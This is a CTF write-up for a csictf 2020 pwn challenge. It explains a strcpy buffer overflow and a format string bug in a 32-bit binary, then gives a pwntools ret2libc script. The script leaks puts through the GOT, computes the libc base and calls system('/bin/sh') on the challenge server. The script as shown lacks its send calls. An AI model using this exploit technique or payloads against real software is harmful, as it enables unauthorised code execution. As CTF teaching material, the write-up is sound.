csictf 2020

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22 July 2020


by AnandSaminathan



This time we got a 32-bit binary along with a libc. On inspecting the binary, we found that it contains two functions - main and say_hello. main takes the input (but it is some what secure) but say_hello has some issues - it copies a longer string (the input from main) to a shorter one using strcpy, so buffer overflow is possible, it also prints the string using printf without a format string, so format string vulnerability is also present.

And there is no code which prints a flag and system function is also not imported, so reverse shell has to be spawned using the system function and “/bin/sh” string (as a parameter to system) present in the libc. Using buffer overflow, the return address of say_hello can we overwritten with system along with “/bin/sh” as input, but their addresses are not deterministic because they are not used by the binary and libc has ASLR protection. One thing that is deterministic about system and “/bin/sh” is their offsets in libc itself (because we have the libc file). So using the vulnerabilities in say_hello, we had to:

We tried finding the base address of libc using the format string vulnerability, it was 42 positions from the stack pointer, that exploit worked locally but didn’t work in the server. So we used the puts function which was imported by the binary to leak libc base. As puts is imported by the binary, it has a GOT and PLT entry inside the binary and the binary is not position independent, so the address of GOT and PLT entries for puts is deterministic - with this intel, puts function can be called via buffer overflow (using PLT entry) and when calling puts if the parameter points to the GOT entry of puts, it will spit out the address of puts during runtime. The base address of libc will be the difference between the runtime address of puts and it’s offset in libc. After leakinig the address, the control has to come back to say_hello or main to ensure that a reverse shell can be generated using the actual address of system and “/bin/sh” (with another buffer overflow).

This script worked:

from pwn import *

elf = ELF('./hello')
libc = ELF('./libc.so.6')
io = remote('chall.csivit.com', 30046)

# return to puts from say_hello, leak puts address and go back to main
payload = "A"*136 + "\xb0\x84\x04\x08\xf0\x84\x04\x08\x24\xa0\x04\x08"
puts = io.recv(4)
puts = u32(puts)
libc_base = puts - 0x5f150
system = libc_base + 0x3a950
binsh = libc_base + 0x15910b

# spawn shell
payload = b"A"*136 + p32(system) + b"A"*4 + p32(binsh) 


After getting a shell, there was a file called flag.txt which contained the flag.


tags: Pwn